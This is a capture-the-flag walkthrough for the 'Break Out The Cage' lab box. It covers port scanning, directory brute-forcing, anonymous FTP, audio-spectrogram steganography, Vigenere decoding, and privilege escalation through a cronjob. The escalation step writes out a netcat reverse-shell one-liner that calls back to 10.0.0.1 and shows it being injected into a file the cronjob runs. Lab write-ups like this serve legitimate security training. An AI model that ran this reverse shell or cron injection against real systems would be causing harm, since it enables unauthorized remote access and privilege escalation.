Break Out The Cage

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.96.253

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.96.253

Enumeration

Port 21: FTP

Anonymous login is allowed, so lets go check it out and download the files on the server

Lets read the file

Looks like its encrypted, lets crack it using CyberChef

It looks like it has been encrypted twice, lets find out what this says too.

This looks like a password, we can try logging into SSH but lets first check Port 80: HTTP

Port 80: HTTP

Looking at the page, we have a username: Weston. None of the links on the page work, so lets gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.96.253/

There is nothing of interest in the /scripts file, the /contracts directory has an empty file. The auditions has a interesting file.

Lets download this to our machine

We can look at this file with a tool called Sonic Visualizer, lets open the file in the app.

Now go to pane and then go to Add Spectrogram click the first option , we are doing this to add a spectrogram so that we can look at hidden data.

We can see a box, lets see what is says.

After changing the color to get a better visual, we can see that it says namelesstwo. Checking around I found out that this is the key for the vignenere cipher that we can use to crack the text we found before.

We have the same text we found before, lets login through ssh now with the username we found in the start Weston.

As the password worked, we can answer the first question

Privilege Escalation

I was looking around when a message popped up.

It looks like there is a cronjob running that executes this script every few minutes, lets go find it. I was searching for a while and could not find it, so lets transfer a tool onto this machine called pspy and have it find the cron file.

To transfer this file, lets start a http listener on our machine and download the file on the victim machine wget. If you just downloaded it, make sure to make it an executable.

Now lets start a http server.

Now lets download the file on the victims machine.

Lets make the file an executable

Now run the file.

Looking through the output we find an interesting file which may be the one we are looking for.

Lets check this file

Lets add a reverse shell to the file .quotes (As the .quotes file is being printed every few minutes) so that we can get a higher privileged user access, that is the owner of the file ./opt/.dads_scripts/.files/.quotes cage. We can see this when we look at the permissions of the file

The reverse shell we will be using is this

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Lets echo the reverse shell into the file and start a netcat listener

After a while, you should get a reverse shell

Lets stabilize the shell

Lets read the file in this directory

We have the user flag.

Next lets cd into the email backup folder and read all the files

Looking through the files, the only interesting thing I found is the string in the third email and the number of times the word FACE has been used, this might be something that will help us, now lets copy it and try to crack it using Cyber Chef.

So FACE was actually the Key to crack this password, this is the password for the root account, lets switch users and read the root flag.

Last updated